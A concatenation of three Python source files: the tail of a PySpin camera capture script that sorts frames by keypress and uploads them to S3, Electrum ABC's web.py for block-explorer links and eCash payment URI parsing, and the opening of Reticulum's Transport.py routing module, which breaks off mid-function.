s3_client_bucket_check = boto3.client('s3')
try:
response = s3_client_bucket_check.head_bucket(Bucket=bucket_name)
except Exception as e:
logging.debug(e)
return False
return True
class ProgressPercentage(object):
def __init__(self, filename):
self._filename = filename
self._size = float(os.path.getsize(filename))
self._seen_so_far = 0
self._lock = threading.Lock()
def __call__(self, bytes_amount):
# To simplify, assume this is hooked up to a single filename
with self._lock:
self._seen_so_far += bytes_amount
percentage = (self._seen_so_far / self._size) * 100
sys.stdout.write(
"\r%s %s / %s (%.2f%%)" % (
self._filename, self._seen_so_far, self._size,
percentage))
sys.stdout.flush()
def upload_file(file_name, bucket, object_name=None):
global s3_client_upload
"""Upload a file to an S3 bucket
:param file_name: File to upload
:param bucket: Bucket to upload to
:param object_name: S3 object name. If not specified then file_name is used
:return: True if file was uploaded, else False
"""
# If S3 object_name was not specified, use file_name
if object_name is None:
object_name = file_name
if s3_client_upload == None:
s3_client_upload = boto3.client('s3')
try:
s3_client_upload.upload_file(file_name, bucket, object_name,
Callback=ProgressPercentage(file_name))
print('\n')
except ClientError as e:
logging.error(e)
return False
return True
def print_device_info(nodemap):
print('*** DEVICE INFORMATION ***\n')
try:
node_device_information = PySpin.CCategoryPtr(nodemap.GetNode('DeviceInformation'))
if PySpin.IsAvailable(node_device_information) and PySpin.IsReadable(node_device_information):
features = node_device_information.GetFeatures()
for feature in features:
node_feature = PySpin.CValuePtr(feature)
print('%s: %s' % (node_feature.GetName(),
node_feature.ToString() if PySpin.IsReadable(node_feature) else 'Node not readable'))
else:
print('Device control information not available.')
except PySpin.SpinnakerException as ex:
print('Error: %s' % ex)
return False
return True
def configure_trigger(cam):
try:
if cam.TriggerMode.GetAccessMode() != PySpin.RW:
print('Unable to disable trigger mode (node retrieval). Aborting...')
return False
cam.TriggerMode.SetValue(PySpin.TriggerMode_Off)
if cam.TriggerSource.GetAccessMode() != PySpin.RW:
print('Unable to get trigger source (node retrieval). Aborting...')
return False
cam.TriggerSource.SetValue(PySpin.TriggerSource_Software)
cam.TriggerMode.SetValue(PySpin.TriggerMode_On)
except PySpin.SpinnakerException as ex:
print('Error: %s' % ex)
return False
return True
def reset_trigger(cam):
try:
if cam.TriggerMode.GetAccessMode() != PySpin.RW:
print('Unable to disable trigger mode (node retrieval). Aborting...')
return False
cam.TriggerMode.SetValue(PySpin.TriggerMode_Off)
except PySpin.SpinnakerException as ex:
print('Error: %s' % ex)
return False
return True
def configure_trigger_ready_line(cam):
try:
cam.LineSelector.SetValue(PySpin.LineSelector_Line2)
cam.LineMode.SetValue(PySpin.LineMode_Output)
lineSourceNode = PySpin.CEnumerationPtr(cam.GetNodeMap().GetNode("LineSource"))
frameTriggerWaitEntry = lineSourceNode.GetEntryByName("FrameTriggerWait")
lineSourceNode.SetIntValue(frameTriggerWaitEntry.GetValue())
except PySpin.SpinnakerException as ex:
print('Error: %s' % ex)
return False
return True
def triggerReady(cam):
return (cam.LineStatusAll() & (1 << 2)) != 0
def grab_next_image_by_trigger(cam):
try:
# Execute software trigger
if cam.TriggerSoftware.GetAccessMode() != PySpin.WO:
print('Unable to execute trigger. Aborting...')
return False
cam.TriggerSoftware.Execute()
except PySpin.SpinnakerException as ex:
print('Error: %s' % ex)
return False
return True
def process_images(serial_number, image_queue):
while(1):
image_to_save = image_queue.get(block = True)
if image_to_save == None:
break
filepath = image_to_save.category_str + '/' + image_to_save.filename
print('Image saved at path: %s'% filepath)
cv2.imwrite(filepath, image_to_save.image_data)
if flags.FLAGS.send_to_cloud:
upload_file(filepath, flags.FLAGS.s3_bucket_name, filepath)
def acquire_images(cam, image_queue):
cv2.namedWindow(WINDOW_NAME)
cv2.moveWindow(WINDOW_NAME, 0, 0)
try:
# Stop Acquisition if image is streaming
if(cam.IsStreaming()):
cam.EndAcquisition()
# Retrieve Stream Parameters device nodemap
s_node_map = cam.GetTLStreamNodeMap()
# Retrieve Buffer Handling Mode Information
handling_mode = PySpin.CEnumerationPtr(s_node_map.GetNode('StreamBufferHandlingMode'))
handling_mode_entry = handling_mode.GetEntryByName('NewestOnly')
handling_mode.SetIntValue(handling_mode_entry.GetValue())
# Set stream buffer Count Mode to manual
stream_buffer_count_mode = PySpin.CEnumerationPtr(s_node_map.GetNode('StreamBufferCountMode'))
stream_buffer_count_mode_manual = PySpin.CEnumEntryPtr(stream_buffer_count_mode.GetEntryByName('Manual'))
stream_buffer_count_mode.SetIntValue(stream_buffer_count_mode_manual.GetValue())
# Retrieve and modify Stream Buffer Count
buffer_count = PySpin.CIntegerPtr(s_node_map.GetNode('StreamBufferCountManual'))
buffer_count.SetValue(NUM_BUFFERS)
# Display Buffer Info
print('Buffer Handling Mode: %s' % handling_mode_entry.GetDisplayName())
print('Buffer Count: %d' % buffer_count.GetValue())
print('Maximum Buffer Count: %d' % buffer_count.GetMax())
buffer_count.SetValue(NUM_BUFFERS)
# Set acquisition mode to continuous
if cam.AcquisitionMode.GetAccessMode() != PySpin.RW:
print('Unable to set acquisition mode to continuous. Aborting...')
return False
cam.AcquisitionMode.SetValue(PySpin.AcquisitionMode_Continuous)
print('Acquisition mode set to continuous...')
# Begin acquiring images
cam.BeginAcquisition()
print('Acquiring images. Press esc to end Acquisition.')
# Get device serial number for filename
device_serial_number = cam.GetUniqueID()
info_string = ''
for category in categories:
info_string += "%s:'%s' " % (category.display_name, category.keyboard_string)
# Retrieve, convert, and save images
while(1):
try:
while(not triggerReady(cam)):
time.sleep(0.001)
pass
grab_next_image_by_trigger(cam)
# Retrieve next received image
image_result = cam.GetNextImage()
# Ensure image completion
if image_result.IsIncomplete():
print('Image incomplete with image status %d ...' % image_result.GetImageStatus())
else:
# get a numpy array of the image data
imageArray = image_result.GetNDArray()
if len(imageArray.shape) < 3:
# convert the image from BayerRG8 to RGB8
imageArray = cv2.cvtColor(imageArray, cv2.COLOR_BayerRG2RGB)
displayArray = np.copy(imageArray)
if flags.FLAGS.mirror_display:
displayArray = cv2.flip(displayArray, flipCode = 1)
displayArray = cv2.putText(displayArray,\
info_string, (0,50), FONT, 2,\
INFO_COLOR, 2, cv2.LINE_AA)
if flags.FLAGS.display_scale_factor != 1:
displayArray = cv2.resize(displayArray, (0,0),
fx=flags.FLAGS.display_scale_factor,
fy=flags.FLAGS.display_scale_factor)
cv2.imshow(WINDOW_NAME, displayArray)
keypress = cv2.waitKey(1)
if keypress == 27:
# escape key pressed
break
image_category = None
for category in categories:
if(keypress & 0xFF == ord(category.keyboard_string)):
image_category = category
if(image_category != None):
# Create a unique filename
filename = '%s-%d.%s' % (image_category.data_name,
image_result.GetTimeStamp(), flags.FLAGS.image_file_type)
print('Filename: %s, height :%d, width :%d' %
(filename, imageArray.shape[0], imageArray.shape[1]))
saveArray = np.copy(imageArray)
if flags.FLAGS.save_scale_factor != 1:
saveArray = cv2.resize(imageArray, (0,0),
fx=flags.FLAGS.save_scale_factor,
fy=flags.FLAGS.save_scale_factor)
image_queue.put(ImageToSave(filename, image_category.data_name, saveArray))
displayArray = np.copy(imageArray)
if flags.FLAGS.mirror_display:
displayArray = cv2.flip(displayArray, flipCode=1)
displayArray = cv2.putText(displayArray,\
image_category.display_name , (0,50), FONT, 2,\
image_category.text_color, 2, cv2.LINE_AA)
if flags.FLAGS.display_scale_factor != 1:
displayArray = cv2.resize(displayArray, (0,0),
fx=flags.FLAGS.display_scale_factor,
fy=flags.FLAGS.display_scale_factor)
cv2.imshow(WINDOW_NAME, displayArray)
cv2.waitKey(CATEGORY_DISPLAY_MILLISECONDS)
# Release image
image_result.Release()
except PySpin.SpinnakerException as ex:
print('Error: %s' % ex)
return False
# End acquisition
cam.EndAcquisition()
cv2.destroyAllWindows()
except PySpin.SpinnakerException as ex:
print('Error: %s' % ex)
return False
return True
def run_single_camera(cam):
try:
# Retrieve TL device nodemap and print device information
nodemap_tldevice = cam.GetTLDeviceNodeMap()
print_device_info(nodemap_tldevice)
# Initialize camera
cam.Init()
# Retrieve GenICam nodemap
nodemap = cam.GetNodeMap()
# Configure trigger
if configure_trigger(cam) is False:
return False
# Configure trigger ready line
if configure_trigger_ready_line(cam) is False:
return False
image_queue = queue.Queue()
grab_thread = threading.Thread(target=acquire_images, args=(cam, image_queue,))
process_thread = threading.Thread(target=process_images, args=(cam.GetUniqueID(), image_queue,))
process_thread.start()
grab_thread.start()
grab_thread.join()
print('Finished Acquiring Images')
image_queue.put(None)
process_thread.join()
print('Finished Processing Images')
# Reset trigger
reset_trigger(cam)
# Deinitialize camera
cam.DeInit()
except PySpin.SpinnakerException as ex:
print('Error: %s' % ex)
return False
return True
def main(unused_argv):
# Retrieve singleton reference to system object
system = PySpin.System.GetInstance()
# create the output dirctories
for category in categories:
if(not isdir(category.data_name) or not exists(category.data_name)):
print('Creating output directory: %s' % category.data_name)
try:
mkdir(category.data_name)
except OSError:
print ("Creation of the directory %s failed" % category.data_name)
return
else:
print ("Successfully created the directory %s " % category.data_name)
if flags.FLAGS.send_to_cloud:
# Check if the bucket exists
if bucket_exists(flags.FLAGS.s3_bucket_name):
print('%s exists and you have permission to access it.' % flags.FLAGS.s3_bucket_name)
else:
print('%s does not exist or you do not have permission to access it.' % flags.FLAGS.s3_bucket_name)
return
# Retrieve list of cameras from the system
cam_list = system.GetCameras()
num_cameras = cam_list.GetSize()
print('Number of cameras detected: %d' % num_cameras)
# Finish if there are no cameras
if num_cameras == 0:
# Clear camera list before releasing system
cam_list.Clear()
# Release system instance
system.ReleaseInstance()
print('Not enough cameras!')
input('Done! Press Enter to exit...')
return False
cam = cam_list.GetByIndex(0)
print('Running example for camera...')
run_single_camera(cam)
print('Camera example complete... \n')
# Release reference to camera
# NOTE: Unlike the C++ examples, we cannot rely on pointer objects being automatically
# cleaned up when going out of scope.
# The usage of del is preferred to assigning the variable to None.
del cam
# Clear camera list before releasing system
cam_list.Clear()
# Release system instance
system.ReleaseInstance()
print('Exiting...\n')
if __name__ == "__main__":
app.run(main)
|
web.py
|
# Electrum ABC - lightweight eCash client
# Copyright (C) 2020 The Electrum ABC developers
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import decimal
import enum
import os
import re
import shutil
import sys
import threading
from typing import Dict, Union
import urllib
from .address import Address
from . import bitcoin
from .constants import WHITELISTED_PREFIXES
from . import networks
from .util import format_satoshis_plain, bh2u, bfh, print_error, do_in_main_thread
from . import cashacct
from .i18n import _
class ExplorerUrlParts(enum.Enum):
TX = enum.auto()
ADDR = enum.auto()
BLOCK = enum.auto()
class BlockchainExplorer:
name: str = ""
url_base: str = ""
addr_fmt: str = Address.FMT_CASHADDR
tx_part: str = "tx"
addr_part: str = "address"
block_part: str = "block"
addr_uses_prefix: bool = True
def get_kind_str(self, kind: ExplorerUrlParts) -> str:
if kind == ExplorerUrlParts.TX:
return self.tx_part
if kind == ExplorerUrlParts.ADDR:
return self.addr_part
if kind == ExplorerUrlParts.BLOCK:
return self.block_part
raise RuntimeError(f"Unknown block explorer URL kind {kind} ({type(kind)}")
class Blockchair(BlockchainExplorer):
name = "Blockchair"
url_base = "https://blockchair.com/ecash"
addr_fmt = Address.FMT_CASHADDR_BCH
tx_part = "transaction"
addr_uses_prefix = False
class ViaWallet(BlockchainExplorer):
name = "ViaWallet"
url_base = "https://explorer.viawallet.com/xec"
addr_uses_prefix: bool = False
class BitcoinABC(BlockchainExplorer):
name = "BitcoinABC"
url_base = "https://explorer.bitcoinabc.org"
block_part = "block-height"
class BitcoinABCTestnet(BitcoinABC):
url_base = "https://texplorer.bitcoinabc.org"
class BeCash(BlockchainExplorer):
name = "be.cash"
url_base = "https://explorer.be.cash"
DEFAULT_EXPLORER = BitcoinABC
mainnet_block_explorers = {explorer.name: explorer for explorer in
[Blockchair, ViaWallet, BitcoinABC, BeCash]}
DEFAULT_EXPLORER_TESTNET = BitcoinABCTestnet
testnet_block_explorers = {BitcoinABCTestnet.name: BitcoinABCTestnet}
def BE_info() -> Dict[str, BlockchainExplorer]:
if networks.net is networks.TestNet:
return testnet_block_explorers
return mainnet_block_explorers
def BE_default_explorer() -> BlockchainExplorer:
if networks.net is networks.TestNet:
return DEFAULT_EXPLORER_TESTNET
return DEFAULT_EXPLORER
def BE_name_from_config(config) -> str:
return config.get('block_explorer', BE_default_explorer().name)
def BE_URL(config, kind: ExplorerUrlParts, item: Union[str, Address]) -> str:
explorer_name = BE_name_from_config(config)
explorer = BE_info().get(explorer_name, BE_default_explorer())
kind_str = BlockchainExplorer.get_kind_str(explorer, kind)
if kind == ExplorerUrlParts.ADDR:
assert isinstance(item, Address)
if explorer.addr_uses_prefix:
item = item.to_full_string(explorer.addr_fmt)
else:
item = item.to_string(explorer.addr_fmt)
return "/".join(part for part in (explorer.url_base, kind_str, item) if part)
def BE_sorted_list():
return sorted(BE_info())
def _strip_cashacct_str(s: str) -> str:
'''Strips emojis and ';' characters from a cashacct string
of the form name#number[.123]'''
return cashacct.CashAcct.strip_emoji(s).replace(';', '').strip()
def create_URI(addr, amount, message, *, op_return=None, op_return_raw=None, net=None):
is_cashacct = bool(isinstance(addr, str) and cashacct.CashAcct.parse_string(addr))
if not isinstance(addr, Address) and not is_cashacct:
return ""
if op_return is not None and op_return_raw is not None:
raise ValueError('Must specify exactly one of op_return or op_return_hex as kwargs to create_URI')
if is_cashacct:
scheme, path = cashacct.URI_SCHEME, _strip_cashacct_str(addr)
else:
scheme, path = addr.to_URI_components(net=net)
query = []
if amount:
query.append(f'amount={format_satoshis_plain(amount, 2)}')
if message:
query.append('message=%s'%urllib.parse.quote(message))
if op_return:
query.append(f'op_return={str(op_return)}')
if op_return_raw:
query.append(f'op_return_raw={str(op_return_raw)}')
p = urllib.parse.ParseResult(scheme=scheme,
netloc='', path=path, params='',
query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
def urlencode(s):
''' URL Encode; encodes a url or a uri fragment by %-quoting special chars'''
return urllib.parse.quote(s)
def urldecode(url):
''' Inverse of urlencode '''
return urllib.parse.unquote(url)
def parseable_schemes(net = None) -> tuple:
if net is None:
net = networks.net
return tuple(WHITELISTED_PREFIXES) + (cashacct.URI_SCHEME, )
class ExtraParametersInURIWarning(RuntimeWarning):
''' Raised by parse_URI to indicate the parsing succeeded but that
extra parameters were encountered when parsing.
args[0] is the function return value (dict of parsed args).
args[1:] are the URL parameters that were not understood (unknown params)'''
class DuplicateKeyInURIError(RuntimeError):
''' Raised on duplicate param keys in URI.
args[0] is a translated error message suitable for the UI
args[1:] is the list of duplicate keys. '''
class BadSchemeError(RuntimeError):
''' Raised if the scheme is bad/unknown for a URI. '''
class BadURIParameter(ValueError):
''' Raised if:
- 'amount' is not numeric,
- 'address' is invalid
- bad cashacct string,
- 'time' or 'exp' are not ints
args[0] is the bad argument name e.g. 'amount'
args[1] is the underlying Exception that was raised (if any, may be missing). '''
def parse_URI(uri, on_pr=None, *, net=None, strict=False, on_exc=None):
""" If strict=True, may raise ExtraParametersInURIWarning (see docstring
above).
on_pr - a callable that will run in the context of a daemon thread if this
is a payment request which requires further network processing. A single
argument is passed to the callable, the payment request after being verified
on the network. Note: as stated, this runs in the context of the daemon
thread, unlike on_exc below.
on_exc - (optional) a callable that will be executed in the *main thread*
only in the cases of payment requests and only if they fail to serialize or
deserialize. The callable must take 1 arg, a sys.exc_info() tuple. Note: as
stateed, this runs in the context of the main thread always, unlike on_pr
above.
May raise DuplicateKeyInURIError if duplicate keys were found.
May raise BadSchemeError if unknown scheme.
May raise Exception subclass on other misc. failure.
Returns a dict of uri_param -> value on success """
if net is None:
net = networks.net
if ':' not in uri:
# Test it's valid
Address.from_string(uri, net=net)
return {'address': uri}
u = urllib.parse.urlparse(uri, allow_fragments=False) # allow_fragments=False allows for cashacct:name#number URIs
# The scheme always comes back in lower case
accept_schemes = parseable_schemes(net=net)
if u.scheme not in accept_schemes:
raise BadSchemeError(_("Not a {schemes} URI").format(schemes=str(accept_schemes)))
address = u.path
is_cashacct = u.scheme == cashacct.URI_SCHEME
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query, keep_blank_values=True)
else:
pq = urllib.parse.parse_qs(u.query, keep_blank_values=True)
for k, v in pq.items():
if len(v) != 1:
raise DuplicateKeyInURIError(_('Duplicate key in URI'), k)
out = {k: v[0] for k, v in pq.items()}
if address:
if is_cashacct:
if '%' in address:
# on macOS and perhaps other platforms the '#' character may
# get passed-in as a '%23' if opened from a link or from
# some other source. The below call is safe and won't raise.
address = urldecode(address)
if not cashacct.CashAcct.parse_string(address):
raise BadURIParameter('address', ValueError(_("{acct_name} is not a valid cashacct string").format(acct_name=address)))
address = _strip_cashacct_str(address)
else:
# validate
try: Address.from_string(address, net=net)
except Exception as e: raise BadURIParameter('address', e) from e
out['address'] = address
if 'amount' in out:
try:
am = out['amount']
m = re.match(r'([0-9.]+)X([0-9]{2})', am)
if m:
k = int(m.group(2)) - 2
amount = decimal.Decimal(m.group(1)) * int(pow(10, k))
else:
amount = decimal.Decimal(am) * int(bitcoin.CASH)
out['amount'] = int(amount)
except (ValueError, decimal.InvalidOperation, TypeError) as e:
raise BadURIParameter('amount', e) from e
if strict and 'memo' in out and 'message' in out:
# these two args are equivalent and cannot both appear together
raise DuplicateKeyInURIError(_('Duplicate key in URI'), 'memo', 'message')
elif 'message' in out:
out['memo'] = out['message']
elif 'memo' in out:
out['message'] = out['memo']
if 'time' in out:
try: out['time'] = int(out['time'])
except ValueError as e: raise BadURIParameter('time', e) from e
if 'exp' in out:
try: out['exp'] = int(out['exp'])
except ValueError as e: raise BadURIParameter('exp', e) from e
if 'sig' in out:
try: out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
except Exception as e: raise BadURIParameter('sig', e) from e
if 'op_return_raw' in out and 'op_return' in out:
if strict:
# these two args cannot both appear together
raise DuplicateKeyInURIError(_('Duplicate key in URI'), 'op_return', 'op_return_raw')
del out['op_return_raw'] # if not strict, just pick 1 and delete the other
if 'op_return_raw' in out:
# validate op_return_raw arg
try: bfh(out['op_return_raw'])
except Exception as e: raise BadURIParameter('op_return_raw', e) from e
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
is_pr = bool(r or (name and sig))
if is_pr and is_cashacct:
raise ValueError(_("'{uri_scheme}' payment requests are not currently supported").format(uri_scheme=cashacct.URI_SCHEME))
if on_pr and is_pr:
def get_payment_request_thread():
from . import paymentrequest as pr
try:
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
except:
''' May happen if the values in the request are such
that they cannot be serialized to a protobuf. '''
einfo = sys.exc_info()
print_error("Error processing payment request:", str(einfo[1]))
if on_exc:
do_in_main_thread(on_exc, einfo)
return
if on_pr:
# FIXME: See about also making this use do_in_main_thread.
# However existing code for Android and/or iOS may not be
# expecting this, so we will leave the original code here where
# it runs in the daemon thread context. :/
on_pr(request)
t = threading.Thread(target=get_payment_request_thread, daemon=True)
t.start()
if strict:
accept_keys = {'r', 'sig', 'name', 'address', 'amount', 'label', 'message', 'memo', 'op_return', 'op_return_raw', 'time', 'exp'}
extra_keys = set(out.keys()) - accept_keys
if extra_keys:
raise ExtraParametersInURIWarning(out, *tuple(extra_keys))
return out
def check_www_dir(rdir):
if not os.path.exists(rdir):
os.mkdir(rdir)
index = os.path.join(rdir, 'index.html')
if not os.path.exists(index):
print_error("copying index.html")
src = os.path.join(os.path.dirname(__file__), 'www', 'index.html')
shutil.copy(src, index)
files = [
"https://code.jquery.com/jquery-1.9.1.min.js",
"https://raw.githubusercontent.com/davidshimjs/qrcodejs/master/qrcode.js",
"https://code.jquery.com/ui/1.10.3/jquery-ui.js",
"https://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css"
]
for URL in files:
path = urllib.parse.urlsplit(URL).path
filename = os.path.basename(path)
path = os.path.join(rdir, filename)
if not os.path.exists(path):
print_error("downloading ", URL)
urllib.request.urlretrieve(URL, path)
|
Transport.py
|
import os
import RNS
import time
import math
import struct
import threading
import traceback
from time import sleep
from .vendor import umsgpack as umsgpack
class Transport:
"""
Through static methods of this class you can interact with the
Transport system of Reticulum.
"""
# Constants
BROADCAST = 0x00;
TRANSPORT = 0x01;
RELAY = 0x02;
TUNNEL = 0x03;
types = [BROADCAST, TRANSPORT, RELAY, TUNNEL]
REACHABILITY_UNREACHABLE = 0x00
REACHABILITY_DIRECT = 0x01
REACHABILITY_TRANSPORT = 0x02
APP_NAME = "rnstransport"
PATHFINDER_M = 128 # Max hops
"""
Maximum amount of hops that Reticulum will transport a packet.
"""
PATHFINDER_C = 2.0 # Decay constant
PATHFINDER_R = 1 # Retransmit retries
PATHFINDER_T = 10 # Retry grace period
PATHFINDER_RW = 10 # Random window for announce rebroadcast
PATHFINDER_E = 60*60*24*7 # Path expiration in seconds
# TODO: Calculate an optimal number for this in
# various situations
LOCAL_REBROADCASTS_MAX = 2 # How many local rebroadcasts of an announce is allowed
PATH_REQUEST_GRACE = 0.35 # Grace time before a path announcement is made, allows directly reachable peers to respond first
PATH_REQUEST_RW = 2 # Path request random window
LINK_TIMEOUT = RNS.Link.KEEPALIVE * 2
REVERSE_TIMEOUT = 30*60 # Reverse table entries are removed after max 30 minutes
DESTINATION_TIMEOUT = PATHFINDER_E # Destination table entries are removed if unused for one week
MAX_RECEIPTS = 1024 # Maximum number of receipts to keep track of
interfaces = [] # All active interfaces
destinations = [] # All active destinations
pending_links = [] # Links that are being established
active_links = [] # Links that are active
packet_hashlist = [] # A list of packet hashes for duplicate detection
receipts = [] # Receipts of all outgoing packets for proof processing
# TODO: "destination_table" should really be renamed to "path_table"
# Notes on memory usage: 1 megabyte of memory can store approximately
# 55.100 path table entries or approximately 22.300 link table entries.
announce_table = {} # A table for storing announces currently waiting to be retransmitted
destination_table = {} # A lookup table containing the next hop to a given destination
reverse_table = {} # A lookup table for storing packet hashes used to return proofs and replies
link_table = {} # A lookup table containing hops for links
held_announces = {} # A table containing temporarily held announce-table entries
announce_handlers = [] # A table storing externally registered announce handlers
tunnels = {} # A table storing tunnels to other transport instances
# Transport control destinations are used
# for control purposes like path requests
control_destinations = []
control_hashes = []
# Interfaces for communicating with
# local clients connected to a shared
# Reticulum instance
local_client_interfaces = []
local_client_rssi_cache = []
local_client_snr_cache = []
LOCAL_CLIENT_CACHE_MAXSIZE = 512
jobs_locked = False
jobs_running = False
job_interval = 0.250
receipts_last_checked = 0.0
receipts_check_interval = 1.0
announces_last_checked = 0.0
announces_check_interval = 1.0
hashlist_maxsize = 1000000
tables_last_culled = 0.0
tables_cull_interval = 5.0
identity = None
@staticmethod
def start(reticulum_instance):
Transport.owner = reticulum_instance
if Transport.identity == None:
transport_identity_path = RNS.Reticulum.storagepath+"/transport_identity"
if os.path.isfile(transport_identity_path):
Transport.identity = RNS.Identity.from_file(transport_identity_path)
if Transport.identity == None:
RNS.log("No valid Transport Identity in storage, creating...", RNS.LOG_VERBOSE)
Transport.identity = RNS.Identity()
Transport.identity.to_file(transport_identity_path)
else:
RNS.log("Loaded Transport Identity from storage", RNS.LOG_VERBOSE)
packet_hashlist_path = RNS.Reticulum.storagepath+"/packet_hashlist"
if os.path.isfile(packet_hashlist_path):
try:
file = open(packet_hashlist_path, "rb")
Transport.packet_hashlist = umsgpack.unpackb(file.read())
file.close()
except Exception as e:
RNS.log("Could not load packet hashlist from storage, the contained exception was: "+str(e), RNS.LOG_ERROR)
# Create transport-specific destinations
Transport.path_request_destination = RNS.Destination(None, RNS.Destination.IN, RNS.Destination.PLAIN, Transport.APP_NAME, "path", "request")
Transport.path_request_destination.set_packet_callback(Transport.path_request_handler)
Transport.control_destinations.append(Transport.path_request_destination)
Transport.control_hashes.append(Transport.path_request_destination.hash)
Transport.tunnel_synthesize_destination = RNS.Destination(None, RNS.Destination.IN, RNS.Destination.PLAIN, Transport.APP_NAME, "tunnel", "synthesize")
Transport.tunnel_synthesize_destination.set_packet_callback(Transport.tunnel_synthesize_handler)
Transport.control_destinations.append(Transport.tunnel_synthesize_handler)
Transport.control_hashes.append(Transport.tunnel_synthesize_destination.hash)
thread = threading.Thread(target=Transport.jobloop)
thread.setDaemon(True)
thread.start()
if RNS.Reticulum.transport_enabled():
destination_table_path = RNS.Reticulum.storagepath+"/destination_table"
tunnel_table_path = RNS.Reticulum.storagepath+"/tunnels"
if os.path.isfile(destination_table_path) and not Transport.owner.is_connected_to_shared_instance:
serialised_destinations = []
try:
file = open(destination_table_path, "rb")
serialised_destinations = umsgpack.unpackb(file.read())
file.close()
for serialised_entry in serialised_destinations:
destination_hash = serialised_entry[0]
timestamp = serialised_entry[1]
received_from = serialised_entry[2]
hops = serialised_entry[3]
expires = serialised_entry[4]
random_blobs = serialised_entry[5]
receiving_interface = Transport.find_interface_from_hash(serialised_entry[6])
announce_packet = Transport.get_cached_packet(serialised_entry[7])
if announce_packet != None and receiving_interface != None:
announce_packet.unpack()
# We increase the hops, since reading a packet
# from cache is equivalent to receiving it again
# over an interface. It is cached with it's non-
# increased hop-count.
announce_packet.hops += 1
Transport.destination_table[destination_hash] = [timestamp, received_from, hops, expires, random_blobs, receiving_interface, announce_packet]
RNS.log("Loaded path table entry for "+RNS.prettyhexrep(destination_hash)+" from storage", RNS.LOG_DEBUG)
else:
RNS.log("Could not reconstruct path table entry from storage for "+RNS.prettyhexrep(destination_hash), RNS.LOG_DEBUG)
if announce_packet == None:
RNS.log("The announce packet could not be loaded from cache", RNS.LOG_DEBUG)
if receiving_interface == None:
RNS.log("The interface is no longer available", RNS.LOG_DEBUG)
if len(Transport.destination_table) == 1:
specifier = "entry"
else:
specifier = "entries"
RNS.log("Loaded "+str(len(Transport.destination_table))+" path table "+specifier+" from storage", RNS.LOG_VERBOSE)
except Exception as e:
RNS.log("Could not load destination table from storage, the contained exception was: "+str(e), RNS.LOG_ERROR)
if os.path.isfile(tunnel_table_path) and not Transport.owner.is_connected_to_shared_instance:
serialised_tunnels = []
try:
file = open(tunnel_table_path, "rb")
serialised_tunnels = umsgpack.unpackb(file.read())
file.close()
for serialised_tunnel in serialised_tunnels:
tunnel_id = serialised_tunnel[0]
interface_hash = serialised_tunnel[1]
serialised_paths = serialised_tunnel[2]
expires = serialised_tunnel[3]
tunnel_paths = {}
for serialised_entry in serialised_paths:
destination_hash = serialised_entry[0]
timestamp = serialised_entry[1]
received_from = serialised_entry[2]
hops = serialised_entry[3]
expires = serialised_entry[4]
random_blobs = serialised_entry[5]
receiving_interface = Transport.find_interface_from_hash(serialised_entry[6])
announce_packet = Transport.get_cached_packet(serialised_entry[7])
if announce_packet != None:
announce_packet.unpack()
# We increase the hops, since reading a packet
# from cache is equivalent to receiving it again
# over an interface. It is cached with it's non-
# increased hop-count.
announce_packet.hops += 1
tunnel_path = [timestamp, received_from, hops, expires, random_blobs, receiving_interface, announce_packet]
tunnel_paths[destination_hash] = tunnel_path
tunnel = [tunnel_id, None, tunnel_paths, expires]
Transport.tunnels[tunnel_id] = tunnel
if len(Transport.destination_table) == 1:
specifier = "entry"
else:
specifier = "entries"
RNS.log("Loaded "+str(len(Transport.tunnels))+" tunnel table "+specifier+" from storage", RNS.LOG_VERBOSE)
except Exception as e:
RNS.log("Could not load tunnel table from storage, the contained exception was: "+str(e), RNS.LOG_ERROR)
RNS.log("Transport instance "+str(Transport.identity)+" started", RNS.LOG_VERBOSE)
# Synthesize tunnels for any interfaces wanting it
for interface in Transport.interfaces:
interface.tunnel_id = None
if hasattr(interface, "wants_tunnel") and interface.wants_tunnel:
Transport.synthesize_tunnel(interface)
@staticmethod
def jobloop():
while (True):
Transport.jobs()
sleep(Transport.job_interval)
@staticmethod
def jobs():
outgoing = []
Transport.jobs_running = True
try:
if not Transport.jobs_locked:
# Process receipts list for timed-out packets
if time.time() > Transport.receipts_last_checked+Transport.receipts_check_interval:
while len(Transport.receipts) > Transport.MAX_RECEIPTS:
culled_receipt = Transport.receipts.pop(0)
culled_receipt.timeout = -1
culled_receipt.check_timeout()
for receipt in Transport.receipts:
receipt.check_timeout()
if receipt.status != RNS.PacketReceipt.SENT:
Transport.receipts.remove(receipt)
Transport.receipts_last_checked = time.time()
# Process announces needing retransmission
if time.time() > Transport.announces_last_checked+Transport.announces_check_interval:
for destination_hash in Transport.announce_table:
announce_entry = Transport.announce_table[destination_hash]
if announce_entry[2] > Transport.PATHFINDER_R:
RNS.log("Dropping announce for "+RNS.prettyhexrep(destination_hash)+", retries exceeded", RNS.LOG_DEBUG)
Transport.announce_table.pop(destination_hash)
break
else:
if time.time() > announce_entry[1]:
announce_entry[1] = time.time() + math.pow(Transport.PATHFINDER_C, announce_entry[4]) + Transport.PATHFINDER_T + Transport.PATHFINDER_RW
announce_entry[2] += 1
packet = announce_entry[5]
block_rebroadcasts = announce_entry[7]
attached_interface = announce_entry[8]
